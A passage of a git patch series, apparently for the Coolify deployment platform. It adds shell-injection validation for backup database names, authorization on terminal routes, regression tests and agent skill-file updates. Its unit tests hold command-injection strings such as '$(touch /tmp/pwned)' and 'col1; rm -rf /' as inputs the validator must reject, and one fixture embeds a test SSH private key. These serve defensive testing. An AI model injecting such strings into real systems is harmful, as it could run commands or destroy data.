-                            "Database #{$position} ('{$dbName}') validation failed: ".
-                            $e->getMessage()
-                        );
-                    }
-                }
+                validateDatabasesBackupInput($this->databasesToBackup);
             }
 
             $this->backup->databases_to_backup = $this->databasesToBackup;
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index a8cffcaff..84472a07e 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -148,6 +148,59 @@ function validateShellSafePath(string $input, string $context = 'path'): string
     return $input;
 }
 
+/**
+ * Validate that a databases_to_backup input string is safe from command injection.
+ *
+ * Supports all database formats:
+ * - PostgreSQL/MySQL/MariaDB: "db1,db2,db3"
+ * - MongoDB: "db1:col1,col2|db2:col3,col4"
+ *
+ * Validates each database name AND collection name individually against shell metacharacters.
+ *
+ * @param  string  $input  The databases_to_backup string
+ * @return string The validated input
+ *
+ * @throws \Exception If any component contains dangerous characters
+ */
+function validateDatabasesBackupInput(string $input): string
+{
+    // Split by pipe (MongoDB multi-db separator)
+    $databaseEntries = explode('|', $input);
+
+    foreach ($databaseEntries as $entry) {
+        $entry = trim($entry);
+        if ($entry === '' || $entry === 'all' || $entry === '*') {
+            continue;
+        }
+
+        if (str_contains($entry, ':')) {
+            // MongoDB format: dbname:collection1,collection2
+            $databaseName = str($entry)->before(':')->value();
+            $collections = str($entry)->after(':')->explode(',');
+
+            validateShellSafePath($databaseName, 'database name');
+
+            foreach ($collections as $collection) {
+                $collection = trim($collection);
+                if ($collection !== '') {
+                    validateShellSafePath($collection, 'collection name');
+                }
+            }
+        } else {
+            // Simple format: just a database name (may contain commas for non-Mongo)
+            $databases = explode(',', $entry);
+            foreach ($databases as $db) {
+                $db = trim($db);
+                if ($db !== '' && $db !== 'all' && $db !== '*') {
+                    validateShellSafePath($db, 'database name');
+                }
+            }
+        }
+    }
+
+    return $input;
+}
+
 /**
  * Validate that a string is a safe git ref (commit SHA, branch name, tag, or HEAD).
  *
diff --git a/tests/Unit/DatabaseBackupSecurityTest.php b/tests/Unit/DatabaseBackupSecurityTest.php
index 6fb0bb4b9..90940c174 100644
--- a/tests/Unit/DatabaseBackupSecurityTest.php
+++ b/tests/Unit/DatabaseBackupSecurityTest.php
@@ -81,3 +81,64 @@
     expect(fn () => validateShellSafePath('test123', 'database name'))
         ->not->toThrow(Exception::class);
 });
+
+// --- MongoDB collection name validation tests ---
+
+test('mongodb collection name rejects command substitution injection', function () {
+    expect(fn () => validateShellSafePath('$(touch /tmp/pwned)', 'collection name'))
+        ->toThrow(Exception::class);
+});
+
+test('mongodb collection name rejects backtick injection', function () {
+    expect(fn () => validateShellSafePath('`id > /tmp/pwned`', 'collection name'))
+        ->toThrow(Exception::class);
+});
+
+test('mongodb collection name rejects semicolon injection', function () {
+    expect(fn () => validateShellSafePath('col1; rm -rf /', 'collection name'))
+        ->toThrow(Exception::class);
+});
+
+test('mongodb collection name rejects ampersand injection', function () {
+    expect(fn () => validateShellSafePath('col1 & whoami', 'collection name'))
+        ->toThrow(Exception::class);
+});
+
+test('mongodb collection name rejects redirect injection', function () {
+    expect(fn () => validateShellSafePath('col1 > /tmp/pwned', 'collection name'))
+        ->toThrow(Exception::class);
+});
+
+test('validateDatabasesBackupInput validates mongodb format with collection names', function () {
+    // Valid MongoDB formats should pass
+    expect(fn () => validateDatabasesBackupInput('mydb'))
+        ->not->toThrow(Exception::class);
+
+    expect(fn () => validateDatabasesBackupInput('mydb:col1,col2'))
+        ->not->toThrow(Exception::class);
+
+    expect(fn () => validateDatabasesBackupInput('db1:col1,col2|db2:col3'))
+        ->not->toThrow(Exception::class);
+
+    expect(fn () => validateDatabasesBackupInput('all'))
+        ->not->toThrow(Exception::class);
+});
+
+test('validateDatabasesBackupInput rejects injection in collection names', function () {
+    // Command substitution in collection name
+    expect(fn () => validateDatabasesBackupInput('mydb:$(touch /tmp/pwned)'))
+        ->toThrow(Exception::class);
+
+    // Backtick injection in collection name
+    expect(fn () => validateDatabasesBackupInput('mydb:`id`'))
+        ->toThrow(Exception::class);
+
+    // Semicolon in collection name
+    expect(fn () => validateDatabasesBackupInput('mydb:col1;rm -rf /'))
+        ->toThrow(Exception::class);
+});
+
+test('validateDatabasesBackupInput rejects injection in database name within mongo format', function () {
+    expect(fn () => validateDatabasesBackupInput('$(whoami):col1,col2'))
+        ->toThrow(Exception::class);
+});

From 847166a3f89b7c80972fa0d2e5c754976f95b6ad Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 16:56:37 +0100
Subject: [PATCH 134/213] fix(terminal): apply authorization middleware to
 terminal bootstrap routes

Apply the existing `can.access.terminal` middleware to `POST /terminal/auth`
and `POST /terminal/auth/ips` routes, consistent with the `GET /terminal` route.

Adds regression tests covering unauthenticated, member, admin, and owner roles.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 routes/web.php                                |   4 +-
 .../TerminalAuthRoutesAuthorizationTest.php   | 118 ++++++++++++++++++
 2 files changed, 120 insertions(+), 2 deletions(-)
 create mode 100644 tests/Feature/TerminalAuthRoutesAuthorizationTest.php

diff --git a/routes/web.php b/routes/web.php
index 27763f121..4154fefab 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -164,7 +164,7 @@
         }
 
         return response()->json(['authenticated' => false], 401);
-    })->name('terminal.auth');
+    })->name('terminal.auth')->middleware('can.access.terminal');
 
     Route::post('/terminal/auth/ips', function () {
         if (auth()->check()) {
@@ -189,7 +189,7 @@
         }
 
         return response()->json(['ipAddresses' => []], 401);
-    })->name('terminal.auth.ips');
+    })->name('terminal.auth.ips')->middleware('can.access.terminal');
 
     Route::prefix('invitations')->group(function () {
         Route::get('/{uuid}', [Controller::class, 'acceptInvitation'])->name('team.invitation.accept');
diff --git a/tests/Feature/TerminalAuthRoutesAuthorizationTest.php b/tests/Feature/TerminalAuthRoutesAuthorizationTest.php
new file mode 100644
index 000000000..858cc7101
--- /dev/null
+++ b/tests/Feature/TerminalAuthRoutesAuthorizationTest.php
@@ -0,0 +1,118 @@
+<?php
+
+use App\Models\PrivateKey;
+use App\Models\Server;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    config()->set('app.env', 'local');
+
+    $this->team = Team::factory()->create();
+
+    $this->privateKey = PrivateKey::create([
+        'name' => 'Test Key',
+        'private_key' => '-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+QyNTUxOQAAACBbhpqHhqv6aI67Mj9abM3DVbmcfYhZAhC7ca4d9UCevAAAAJi/QySHv0Mk
+hwAAAAtzc2gtZWQyNTUxOQAAACBbhpqHhqv6aI67Mj9abM3DVbmcfYhZAhC7ca4d9UCevA
+AAAECBQw4jg1WRT2IGHMncCiZhURCts2s24HoDS0thHnnRKVuGmoeGq/pojrsyP1pszcNV
+uZx9iFkCELtxrh31QJ68AAAAEXNhaWxANzZmZjY2ZDJlMmRkAQIDBA==
+-----END OPENSSH PRIVATE KEY-----',
+        'team_id' => $this->team->id,
+    ]);
+
+    Server::factory()->create([
+        'name' => 'Test Server',
+        'ip' => 'coolify-testing-host',
+        'team_id' => $this->team->id,
+        'private_key_id' => $this->privateKey->id,
+    ]);
+});
+
+// --- POST /terminal/auth ---
+
+it('denies unauthenticated users on POST /terminal/auth', function () {
+    $this->postJson('/terminal/auth')
+        ->assertStatus(401);
+});
+
+it('denies non-admin team members on POST /terminal/auth', function () {
+    $member = User::factory()->create();
+    $member->teams()->attach($this->team, ['role' => 'member']);
+
+    $this->actingAs($member);
+    session(['currentTeam' => $this->team]);
+
+    $this->postJson('/terminal/auth')
+        ->assertStatus(403);
+});
+
+it('allows team owners on POST /terminal/auth', function () {
+    $owner = User::factory()->create();
+    $owner->teams()->attach($this->team, ['role' => 'owner']);
+
+    $this->actingAs($owner);
+    session(['currentTeam' => $this->team]);
+
+    $this->postJson('/terminal/auth')
+        ->assertStatus(200)
+        ->assertJson(['authenticated' => true]);
+});
+
+it('allows team admins on POST /terminal/auth', function () {
+    $admin = User::factory()->create();
+    $admin->teams()->attach($this->team, ['role' => 'admin']);
+
+    $this->actingAs($admin);
+    session(['currentTeam' => $this->team]);
+
+    $this->postJson('/terminal/auth')
+        ->assertStatus(200)
+        ->assertJson(['authenticated' => true]);
+});
+
+// --- POST /terminal/auth/ips ---
+
+it('denies unauthenticated users on POST /terminal/auth/ips', function () {
+    $this->postJson('/terminal/auth/ips')
+        ->assertStatus(401);
+});
+
+it('denies non-admin team members on POST /terminal/auth/ips', function () {
+    $member = User::factory()->create();
+    $member->teams()->attach($this->team, ['role' => 'member']);
+
+    $this->actingAs($member);
+    session(['currentTeam' => $this->team]);
+
+    $this->postJson('/terminal/auth/ips')
+        ->assertStatus(403);
+});
+
+it('allows team owners on POST /terminal/auth/ips', function () {
+    $owner = User::factory()->create();
+    $owner->teams()->attach($this->team, ['role' => 'owner']);
+
+    $this->actingAs($owner);
+    session(['currentTeam' => $this->team]);
+
+    $this->postJson('/terminal/auth/ips')
+        ->assertStatus(200)
+        ->assertJsonStructure(['ipAddresses']);
+});
+
+it('allows team admins on POST /terminal/auth/ips', function () {
+    $admin = User::factory()->create();
+    $admin->teams()->attach($this->team, ['role' => 'admin']);
+
+    $this->actingAs($admin);
+    session(['currentTeam' => $this->team]);
+
+    $this->postJson('/terminal/auth/ips')
+        ->assertStatus(200)
+        ->assertJsonStructure(['ipAddresses']);
+});

From 0a621bb90ed67420aa407e0b0b01110c73b97a9e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 19:21:53 +0100
Subject: [PATCH 135/213] update laravel boost

---
 .../skills/developing-with-fortify/SKILL.md   | 116 ---
 .agents/skills/livewire-development/SKILL.md  |  54 +-
 .agents/skills/pest-testing/SKILL.md          |  61 +-
 .../skills/tailwindcss-development/SKILL.md   |  49 +-
 .../skills/developing-with-fortify/SKILL.md   | 116 ---
 .claude/skills/livewire-development/SKILL.md  |  54 +-
 .claude/skills/pest-testing/SKILL.md          | 232 ++---
 .../skills/tailwindcss-development/SKILL.md   |  49 +-
 .../skills/developing-with-fortify/SKILL.md   | 116 ---
 .cursor/skills/livewire-development/SKILL.md  |  54 +-
 .cursor/skills/pest-testing/SKILL.md          |  61 +-
 .../skills/tailwindcss-development/SKILL.md   |  49 +-
 AGENTS.md                                     | 169 ++--
 CLAUDE.md                                     | 218 ++---
 boost.json                                    |  11 +-
 composer.lock                                 | 836 +++++++++---------
 16 files changed, 832 insertions(+), 1413 deletions(-)
 delete mode 100644 .agents/skills/developing-with-fortify/SKILL.md
 delete mode 100644 .claude/skills/developing-with-fortify/SKILL.md
 delete mode 100644 .cursor/skills/developing-with-fortify/SKILL.md

diff --git a/.agents/skills/developing-with-fortify/SKILL.md b/.agents/skills/developing-with-fortify/SKILL.md
deleted file mode 100644
index 2ff71a4b4..000000000
--- a/.agents/skills/developing-with-fortify/SKILL.md
+++ /dev/null
@@ -1,116 +0,0 @@
----
-name: developing-with-fortify
-description: Laravel Fortify headless authentication backend development. Activate when implementing authentication features including login, registration, password reset, email verification, two-factor authentication (2FA/TOTP), profile updates, headless auth, authentication scaffolding, or auth guards in Laravel applications.
----
-
-# Laravel Fortify Development
-
-Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
-
-## Documentation
-
-Use `search-docs` for detailed Laravel Fortify patterns and documentation.
-
-## Usage
-
-- **Routes**: Use `list-routes` with `only_vendor: true` and `action: "Fortify"` to see all registered endpoints
-- **Actions**: Check `app/Actions/Fortify/` for customizable business logic (user creation, password validation, etc.)
-- **Config**: See `config/fortify.php` for all options including features, guards, rate limiters, and username field
-- **Contracts**: Look in `Laravel\Fortify\Contracts\` for overridable response classes (`LoginResponse`, `LogoutResponse`, etc.)
-- **Views**: All view callbacks are set in `FortifyServiceProvider::boot()` using `Fortify::loginView()`, `Fortify::registerView()`, etc.
-
-## Available Features
-
-Enable in `config/fortify.php` features array:
-
-- `Features::registration()` - User registration
-- `Features::resetPasswords()` - Password reset via email
-- `Features::emailVerification()` - Requires User to implement `MustVerifyEmail`
-- `Features::updateProfileInformation()` - Profile updates
-- `Features::updatePasswords()` - Password changes
-- `Features::twoFactorAuthentication()` - 2FA with QR codes and recovery codes
-
-> Use `search-docs` for feature configuration options and customization patterns.
-
-## Setup Workflows
-
-### Two-Factor Authentication Setup
-
-```
-- [ ] Add TwoFactorAuthenticatable trait to User model
-- [ ] Enable feature in config/fortify.php
-- [ ] Run migrations for 2FA columns
-- [ ] Set up view callbacks in FortifyServiceProvider
-- [ ] Create 2FA management UI
-- [ ] Test QR code and recovery codes
-```
-
-> Use `search-docs` for TOTP implementation and recovery code handling patterns.
-
-### Email Verification Setup
-
-```
-- [ ] Enable emailVerification feature in config
-- [ ] Implement MustVerifyEmail interface on User model
-- [ ] Set up verifyEmailView callback
-- [ ] Add verified middleware to protected routes
-- [ ] Test verification email flow
-```
-
-> Use `search-docs` for MustVerifyEmail implementation patterns.
-
-### Password Reset Setup
-
-```
-- [ ] Enable resetPasswords feature in config
-- [ ] Set up requestPasswordResetLinkView callback
-- [ ] Set up resetPasswordView callback
-- [ ] Define password.reset named route (if views disabled)
-- [ ] Test reset email and link flow
-```
-
-> Use `search-docs` for custom password reset flow patterns.
-
-### SPA Authentication Setup
-
-```
-- [ ] Set 'views' => false in config/fortify.php
-- [ ] Install and configure Laravel Sanctum
-- [ ] Use 'web' guard in fortify config
-- [ ] Set up CSRF token handling
-- [ ] Test XHR authentication flows
-```
-
-> Use `search-docs` for integration and SPA authentication patterns.
-
-## Best Practices
-
-### Custom Authentication Logic
-
-Override authentication behavior using `Fortify::authenticateUsing()` for custom user retrieval or `Fortify::authenticateThrough()` to customize the authentication pipeline. Override response contracts in `AppServiceProvider` for custom redirects.
-
-### Registration Customization
-
-Modify `app/Actions/Fortify/CreateNewUser.php` to customize user creation logic, validation rules, and additional fields.
-
-### Rate Limiting
-
-Configure via `fortify.limiters.login` in config. Default configuration throttles by username + IP combination.
-
-## Key Endpoints
-
-| Feature                | Method   | Endpoint                                    |
-|------------------------|----------|---------------------------------------------|
-| Login                  | POST     | `/login`                                    |
-| Logout                 | POST     | `/logout`                                   |
-| Register               | POST     | `/register`                                 |
-| Password Reset Request | POST     | `/forgot-password`                          |
-| Password Reset         | POST     | `/reset-password`                           |
-| Email Verify Notice    | GET      | `/email/verify`                             |
-| Resend Verification    | POST     | `/email/verification-notification`          |
-| Password Confirm       | POST     | `/user/confirm-password`                    |
-| Enable 2FA             | POST     | `/user/two-factor-authentication`           |
-| Confirm 2FA            | POST     | `/user/confirmed-two-factor-authentication` |
-| 2FA Challenge          | POST     | `/two-factor-challenge`                     |
-| Get QR Code            | GET      | `/user/two-factor-qr-code`                  |
-| Recovery Codes         | GET/POST | `/user/two-factor-recovery-codes`           |
\ No newline at end of file
diff --git a/.agents/skills/livewire-development/SKILL.md b/.agents/skills/livewire-development/SKILL.md
index 755d20713..70ecd57d4 100644
--- a/.agents/skills/livewire-development/SKILL.md
+++ b/.agents/skills/livewire-development/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: livewire-development
-description: >-
-  Develops reactive Livewire 3 components. Activates when creating, updating, or modifying
-  Livewire components; working with wire:model, wire:click, wire:loading, or any wire: directives;
-  adding real-time updates, loading states, or reactivity; debugging component behavior;
-  writing Livewire tests; or when the user mentions Livewire, component, counter, or reactive UI.
+description: "Use for any task or question involving Livewire. Activate if user mentions Livewire, wire: directives, or Livewire-specific concepts like wire:model, wire:click, invoke this skill. Covers building new components, debugging reactivity issues, real-time form validation, loading states, migrating from Livewire 2 to 3, converting component formats (SFC/MFC/class-based), and performance optimization. Do not use for non-Livewire reactive UI (React, Vue, Alpine-only, Inertia.js) or standard Laravel forms without Livewire."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Livewire Development
 
-## When to Apply
-
-Activate this skill when:
-- Creating new Livewire components
-- Modifying existing component state or behavior
-- Debugging reactivity or lifecycle issues
-- Writing Livewire component tests
-- Adding Alpine.js interactivity to components
-- Working with wire: directives
-
 ## Documentation
 
 Use `search-docs` for detailed Livewire 3 patterns and documentation.
@@ -62,33 +51,31 @@ ### Component Structure
 
 ### Using Keys in Loops
 
-<code-snippet name="Wire Key in Loops" lang="blade">
-
+<!-- Wire Key in Loops -->
+```blade
 @foreach ($items as $item)
     <div wire:key="item-{{ $item->id }}">
         {{ $item->name }}
     </div>
 @endforeach
-
-</code-snippet>
+```
 
 ### Lifecycle Hooks
 
 Prefer lifecycle hooks like `mount()`, `updatedFoo()` for initialization and reactive side effects:
 
-<code-snippet name="Lifecycle Hook Examples" lang="php">
-
+<!-- Lifecycle Hook Examples -->
+```php
 public function mount(User $user) { $this->user = $user; }
 public function updatedSearch() { $this->resetPage(); }
-
-</code-snippet>
+```
 
 ## JavaScript Hooks
 
 You can listen for `livewire:init` to hook into Livewire initialization:
 
-<code-snippet name="Livewire Init Hook Example" lang="js">
-
+<!-- Livewire Init Hook Example -->
+```js
 document.addEventListener('livewire:init', function () {
     Livewire.hook('request', ({ fail }) => {
         if (fail && fail.status === 419) {
@@ -100,28 +87,25 @@ ## JavaScript Hooks
         console.error(message);
     });
 });
-
-</code-snippet>
+```
 
 ## Testing
 
-<code-snippet name="Example Livewire Component Test" lang="php">
-
+<!-- Example Livewire Component Test -->
+```php
 Livewire::test(Counter::class)
     ->assertSet('count', 0)
     ->call('increment')
     ->assertSet('count', 1)
     ->assertSee(1)
     ->assertStatus(200);
+```
 
-</code-snippet>
-
-<code-snippet name="Testing Livewire Component Exists on Page" lang="php">
-
+<!-- Testing Livewire Component Exists on Page -->
+```php
 $this->get('/posts/create')
     ->assertSeeLivewire(CreatePost::class);
-
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/.agents/skills/pest-testing/SKILL.md b/.agents/skills/pest-testing/SKILL.md
index 67455e7e6..ba774e71b 100644
--- a/.agents/skills/pest-testing/SKILL.md
+++ b/.agents/skills/pest-testing/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: pest-testing
-description: >-
-  Tests applications using the Pest 4 PHP framework. Activates when writing tests, creating unit or feature
-  tests, adding assertions, testing Livewire components, browser testing, debugging test failures,
-  working with datasets or mocking; or when the user mentions test, spec, TDD, expects, assertion,
-  coverage, or needs to verify functionality works.
+description: "Use this skill for Pest PHP testing in Laravel projects only. Trigger whenever any test is being written, edited, fixed, or refactored — including fixing tests that broke after a code change, adding assertions, converting PHPUnit to Pest, adding datasets, and TDD workflows. Always activate when the user asks how to write something in Pest, mentions test files or directories (tests/Feature, tests/Unit, tests/Browser), or needs browser testing, smoke testing multiple pages for JS errors, or architecture tests. Covers: it()/expect() syntax, datasets, mocking, browser testing (visit/click/fill), smoke testing, arch(), Livewire component tests, RefreshDatabase, and all Pest 4 features. Do not use for factories, seeders, migrations, controllers, models, or non-test PHP code."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Pest Testing 4
 
-## When to Apply
-
-Activate this skill when:
-
-- Creating new tests (unit, feature, or browser)
-- Modifying existing tests
-- Debugging test failures
-- Working with browser testing or smoke testing
-- Writing architecture tests or visual regression tests
-
 ## Documentation
 
 Use `search-docs` for detailed Pest 4 patterns and documentation.
@@ -37,13 +26,12 @@ ### Test Organization
 
 ### Basic Test Structure
 
-<code-snippet name="Basic Pest Test Example" lang="php">
-
+<!-- Basic Pest Test Example -->
+```php
 it('is true', function () {
     expect(true)->toBeTrue();
 });
-
-</code-snippet>
+```
 
 ### Running Tests
 
@@ -55,13 +43,12 @@ ## Assertions
 
 Use specific assertions (`assertSuccessful()`, `assertNotFound()`) instead of `assertStatus()`:
 
-<code-snippet name="Pest Response Assertion" lang="php">
-
+<!-- Pest Response Assertion -->
+```php
 it('returns all', function () {
     $this->postJson('/api/docs', [])->assertSuccessful();
 });
-
-</code-snippet>
+```
 
 | Use | Instead of |
 |-----|------------|
@@ -77,16 +64,15 @@ ## Datasets
 
 Use datasets for repetitive tests (validation rules, etc.):
 
-<code-snippet name="Pest Dataset Example" lang="php">
-
+<!-- Pest Dataset Example -->
+```php
 it('has emails', function (string $email) {
     expect($email)->not->toBeEmpty();
 })->with([
     'james' => 'james@laravel.com',
     'taylor' => 'taylor@laravel.com',
 ]);
-
-</code-snippet>
+```
 
 ## Pest 4 Features
 
@@ -111,8 +97,8 @@ ### Browser Test Example
 - Switch color schemes (light/dark mode) when appropriate.
 - Take screenshots or pause tests for debugging.
 
-<code-snippet name="Pest Browser Test Example" lang="php">
-
+<!-- Pest Browser Test Example -->
+```php
 it('may reset the password', function () {
     Notification::fake();
 
@@ -129,20 +115,18 @@ ### Browser Test Example
 
     Notification::assertSent(ResetPassword::class);
 });
-
-</code-snippet>
+```
 
 ### Smoke Testing
 
 Quickly validate multiple pages have no JavaScript errors:
 
-<code-snippet name="Pest Smoke Testing Example" lang="php">
-
+<!-- Pest Smoke Testing Example -->
+```php
 $pages = visit(['/', '/about', '/contact']);
 
 $pages->assertNoJavaScriptErrors()->assertNoConsoleLogs();
-
-</code-snippet>
+```
 
 ### Visual Regression Testing
 
@@ -156,14 +140,13 @@ ### Architecture Testing
 
 Pest 4 includes architecture testing (from Pest 3):
 
-<code-snippet name="Architecture Test Example" lang="php">
-
+<!-- Architecture Test Example -->
+```php
 arch('controllers')
     ->expect('App\Http\Controllers')
     ->toExtendNothing()
     ->toHaveSuffix('Controller');
-
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/.agents/skills/tailwindcss-development/SKILL.md b/.agents/skills/tailwindcss-development/SKILL.md
index 12bd896bb..7c8e295e8 100644
--- a/.agents/skills/tailwindcss-development/SKILL.md
+++ b/.agents/skills/tailwindcss-development/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: tailwindcss-development
-description: >-
-  Styles applications using Tailwind CSS v4 utilities. Activates when adding styles, restyling components,
-  working with gradients, spacing, layout, flex, grid, responsive design, dark mode, colors,
-  typography, or borders; or when the user mentions CSS, styling, classes, Tailwind, restyle,
-  hero section, cards, buttons, or any visual/UI changes.
+description: "Always invoke when the user's message includes 'tailwind' in any form. Also invoke for: building responsive grid layouts (multi-column card grids, product grids), flex/grid page structures (dashboards with sidebars, fixed topbars, mobile-toggle navs), styling UI components (cards, tables, navbars, pricing sections, forms, inputs, badges), adding dark mode variants, fixing spacing or typography, and Tailwind v3/v4 work. The core use case: writing or fixing Tailwind utility classes in HTML templates (Blade, JSX, Vue). Skip for backend PHP logic, database queries, API routes, JavaScript with no HTML/CSS component, CSS file audits, build tool configuration, and vanilla CSS."
+license: MIT
+metadata:
+  author: laravel
 ---
 
 # Tailwind CSS Development
 
-## When to Apply
-
-Activate this skill when:
-
-- Adding styles to components or pages
-- Working with responsive design
-- Implementing dark mode
-- Extracting repeated patterns into components
-- Debugging spacing or layout issues
-
 ## Documentation
 
 Use `search-docs` for detailed Tailwind CSS v4 patterns and documentation.
@@ -38,22 +27,24 @@ ### CSS-First Configuration
 
 In Tailwind v4, configuration is CSS-first using the `@theme` directive — no separate `tailwind.config.js` file is needed:
 
-<code-snippet name="CSS-First Config" lang="css">
+<!-- CSS-First Config -->
+```css
 @theme {
   --color-brand: oklch(0.72 0.11 178);
 }
-</code-snippet>
+```
 
 ### Import Syntax
 
 In Tailwind v4, import Tailwind with a regular CSS `@import` statement instead of the `@tailwind` directives used in v3:
 
-<code-snippet name="v4 Import Syntax" lang="diff">
+<!-- v4 Import Syntax -->
+```diff
 - @tailwind base;
 - @tailwind components;
 - @tailwind utilities;
 + @import "tailwindcss";
-</code-snippet>
+```
 
 ### Replaced Utilities
 
@@ -77,43 +68,47 @@ ## Spacing
 
 Use `gap` utilities instead of margins for spacing between siblings:
 
-<code-snippet name="Gap Utilities" lang="html">
+<!-- Gap Utilities -->
+```html
 <div class="flex gap-8">
     <div>Item 1</div>
     <div>Item 2</div>
 </div>
-</code-snippet>
+```
 
 ## Dark Mode
 
 If existing pages and components support dark mode, new pages and components must support it the same way, typically using the `dark:` variant:
 
-<code-snippet name="Dark Mode" lang="html">
+<!-- Dark Mode -->
+```html
 <div class="bg-white dark:bg-gray-900 text-gray-900 dark:text-white">
     Content adapts to color scheme
 </div>
-</code-snippet>
+```
 
 ## Common Patterns
 
 ### Flexbox Layout
 
-<code-snippet name="Flexbox Layout" lang="html">
+<!-- Flexbox Layout -->
+```html
 <div class="flex items-center justify-between gap-4">
     <div>Left content</div>
     <div>Right content</div>
 </div>
-</code-snippet>
+```
 
 ### Grid Layout
 
-<code-snippet name="Grid Layout" lang="html">
+<!-- Grid Layout -->
+```html
 <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-6">
     <div>Card 1</div>
     <div>Card 2</div>
     <div>Card 3</div>
 </div>
-</code-snippet>
+```
 
 ## Common Pitfalls
 
diff --git a/.claude/skills/developing-with-fortify/SKILL.md b/.claude/skills/developing-with-fortify/SKILL.md
deleted file mode 100644
index 2ff71a4b4..000000000
--- a/.claude/skills/developing-with-fortify/SKILL.md
+++ /dev/null
@@ -1,116 +0,0 @@
----
-name: developing-with-fortify
-description: Laravel Fortify headless authentication backend development. Activate when implementing authentication features including login, registration, password reset, email verification, two-factor authentication (2FA/TOTP), profile updates, headless auth, authentication scaffolding, or auth guards in Laravel applications.
----
-
-# Laravel Fortify Development
-
-Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
-
-## Documentation
-
-Use `search-docs` for detailed Laravel Fortify patterns and documentation.
-
-## Usage
-
-- **Routes**: Use `list-routes` with `only_vendor: true` and `action: "Fortify"` to see all registered endpoints
-- **Actions**: Check `app/Actions/Fortify/` for customizable business logic (user creation, password validation, etc.)
-- **Config**: See `config/fortify.php` for all options including features, guards, rate limiters, and username field
-- **Contracts**: Look in `Laravel\Fortify\Contracts\` for overridable response classes (`LoginResponse`, `LogoutResponse`, etc.)
-- **Views**: All view callbacks are set in `FortifyServiceProvider::boot()` using `Fortify::loginView()`, `Fortify::registerView()`, etc.
-
-## Available Features
-
-Enable in `config/fortify.php` features array:
-
-- `Features::registration()` - User registration
-- `Features::resetPasswords()` - Password reset via email
-- `Features::emailVerification()` - Requires User to implement `MustVerifyEmail`
-- `Features::updateProfileInformation()` - Profile updates
-- `Features::updatePasswords()` - Password changes
-- `Features::twoFactorAuthentication()` - 2FA with QR codes and recovery codes
-
-> Use `search-docs` for feature configuration options and customization patterns.
-
-## Setup Workflows
-
-### Two-Factor Authentication Setup
-
-```
-- [ ] Add TwoFactorAuthenticatable trait to User model
-- [ ] Enable feature in config/fortify.php
-- [ ] Run migrations for 2FA columns
-- [ ] Set up view callbacks in FortifyServiceProvider
-- [ ] Create 2FA management UI
-- [ ] Test QR code and recovery codes
-```
-
-> Use `search-docs` for TOTP implementation and recovery code handling patterns.
-
-### Email Verification Setup
-
-```
-- [ ] Enable emailVerification feature in config
-- [ ] Implement MustVerifyEmail interface on User model
-- [ ] Set up verifyEmailView callback
-- [ ] Add verified middleware to protected routes
-- [ ] Test verification email flow
-```
-
-> Use `search-docs` for MustVerifyEmail implementation patterns.
-
-### Password Reset Setup
-
-```
-- [ ] Enable resetPasswords feature in config
-- [ ] Set up requestPasswordResetLinkView callback
-- [ ] Set up resetPasswordView callback
-- [ ] Define password.reset named route (if views disabled)
-- [ ] Test reset email and link flow
-```
-
-> Use `search-docs` for custom password reset flow patterns.
-
-### SPA Authentication Setup
-
-```
-- [ ] Set 'views' => false in config/fortify.php
-- [ ] Install and configure Laravel Sanctum
-- [ ] Use 'web' guard in fortify config
-- [ ] Set up CSRF token handling
-- [ ] Test XHR authentication flows
-```
-
-> Use `search-docs` for integration and SPA authentication patterns.
-
-## Best Practices
-
-### Custom Authentication Logic
-
-Override authentication behavior using `Fortify::authenticateUsing()` for custom user retrieval or `Fortify::authenticateThrough()` to customize the authentication pipeline. Override response contracts in `AppServiceProvider` for custom redirects.
-
-### Registration Customization
-
-Modify `app/Actions/Fortify/CreateNewUser.php` to customize user creation logic, validation rules, and additional fields.
-
-### Rate Limiting
-
-Configure via `fortify.limiters.login` in config. Default configuration throttles by username + IP combination.
-
-## Key Endpoints
-
-| Feature                | Method   | Endpoint                                    |
-|------------------------|----------|---------------------------------------------|
-| Login                  | POST     | `/login`                                    |
-| Logout                 | POST     | `/logout`                                   |
-| Register               | POST     | `/register`                                 |
-| Password Reset Request | POST     | `/forgot-password`                          |
-| Password Reset         | POST     | `/reset-password`                           |
-| Email Verify Notice    | GET      | `/email/verify`                             |
-| Resend Verification    | POST     | `/email/verification-notification`          |
-| Password Confirm       | POST     | `/user/confirm-password`                    |
-| Enable 2FA             | POST     | `/user/two-factor-authentication`           |
-| Confirm 2FA            | POST     | `/user/confirmed-two-factor-authentication` |
-| 2FA Challenge          | POST     | `/two-factor-challenge`                     |
-| Get QR Code            | GET      | `/user/two-factor-qr-code`                  |
-| Recovery Codes         | GET/POST | `/user/two-factor-recovery-codes`           |
\ No newline at end of file
diff --git a/.claude/skills/livewire-development/SKILL.md b/.claude/skills/livewire-development/SKILL.md
index 755d20713..70ecd57d4 100644
--- a/.claude/skills/livewire-development/SKILL.md
+++ b/.claude/skills/livewire-development/SKILL.md
@@ -1,24 +1,13 @@
 ---
 name: livewire-development
-description: >-
-  Develops reactive Livewire 3 components. Activates when creating, updating, or modifying
-  Livewire components; working with wire:model, wire:click, wire:loading, or any wire: directives;
-  adding real-time updates, loading states, or reactivity; debugging component behavior;
